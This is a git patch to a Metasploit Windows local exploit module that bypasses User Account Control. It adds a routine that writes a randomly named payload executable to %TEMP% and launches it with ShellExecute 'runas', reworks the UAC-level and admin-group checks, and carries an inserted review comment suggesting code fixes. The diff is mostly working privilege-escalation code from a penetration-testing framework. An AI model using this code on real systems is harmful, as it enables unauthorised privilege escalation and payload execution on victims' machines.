From 6fdf5cab1537e502fb340532dd71667e34f5231e Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Wed, 23 Oct 2013 21:15:41 +0100
Subject: [PATCH] Update bypassuac_injection inline with latest privs lib

---
 .../windows/local/bypassuac_injection.rb | 52 +++++++++++--------
 1 file changed, 31 insertions(+), 21 deletions(-)

diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb
index 2a0d57e4bb..4ebf4927ac 100644
--- a/modules/exploits/windows/local/bypassuac_injection.rb
+++ b/modules/exploits/windows/local/bypassuac_injection.rb
@@ -12,7 +12,6 @@ class Metasploit3 < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Exploit::EXE
-  include Post::Common
   include Post::File
   include Post::Windows::Priv
 
@@ -52,9 +51,20 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
+  def runas_method
+    payload = generate_payload_exe
+    payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+    tmpdir = expand_path("%TEMP%")
+    tempexe = tmpdir + "\\" + payload_filename
+    write_file(tempexe, payload)
+    print_status("Uploading payload: #{tempexe}")
+    session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
+    print_status("Payload executed")
+  end
+
   def exploit
-    fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin?
+    fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
 
     #
     # Verify use against Vista+
@@ -65,25 +75,27 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     if is_uac_enabled?
-      vprint_status "UAC is Enabled, checking level..."
+      print_status "UAC is Enabled, checking level..."
     else
-      fail_with(Exploit::Failure::NotVulnerable,
-        "UAC is not enabled, no reason to run module, exiting...\r\nRun exploit/windows/local/ask to elevate"
-      )
+      if is_in_admin_group?
+        fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
+      else
+        fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
+      end
     end
 
     case get_uac_level
-    when UACPromptCredsIfSecureDesktop, UACPromptConsentIfSecureDesktop, UACPromptCreds, UACPromptConsent
-      fail_with(Exploit::Failure::NotVulnerable,
-        "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
-      )
-    when UACDefault
-      print_good "UAC is set to Default"
-      vprint_status "BypassUAC can bypass this setting, continuing..."
-    when UACNoPrompt
-      fail_with(Exploit::Failure::NotVulnerable,
-        "UAC is not enabled, no reason to run module\r\nRun exploit/windows/local/ask to elevate"
-      )
+    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+      fail_with(Exploit::Failure::NotVulnerable,
+        "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
+      )
+    when UAC_DEFAULT
+      print_good "UAC is set to Default"
+      print_good "BypassUAC can bypass this setting, continuing..."
+    when UAC_NO_PROMPT
+      print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
+      runas_method
+      return
     end
 
     # Check if you are an admin
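Review bot: The rewritten `case get_uac_level` has no `else` arm, so a value that matches none of the four listed constants (including a nil return from the helper) falls through silently and execution continues into the admin-group checks as though the level were one the module handles; add an `else` arm after `when UAC_NO_PROMPT` with `fail_with(Exploit::Failure::Unknown, "Unrecognised UAC level, cannot continue")` so the unexpected state is reported rather than ignored. The new `else` block under `if is_uac_enabled?` nests a second `if`/`else`; `elsif is_in_admin_group?` expresses the same three-way branch at one level. That branch also appears to treat a nil result from `is_in_admin_group?` as "not in the group" (the next hunk still guards `admin_group` under an outer conditional, which suggests nil is a possible return), so the `NoAccess` message may be misleading in that case. The `exploit` method enclosing this hunk begins and ends outside it.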
@@ -97,13 +109,11 @@ class Metasploit3 < Msf::Exploit::Local
       if admin_group
         print_good('Part of Administrators group! Continuing...')
       else
-        print_error('Not in admins group, cannot escalate with this module')
-        print_error('Exiting...')
-        return
+        fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
       end
     end
 
-    if get_integrity_level == LowIntegrityLevel
+    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
       fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
     end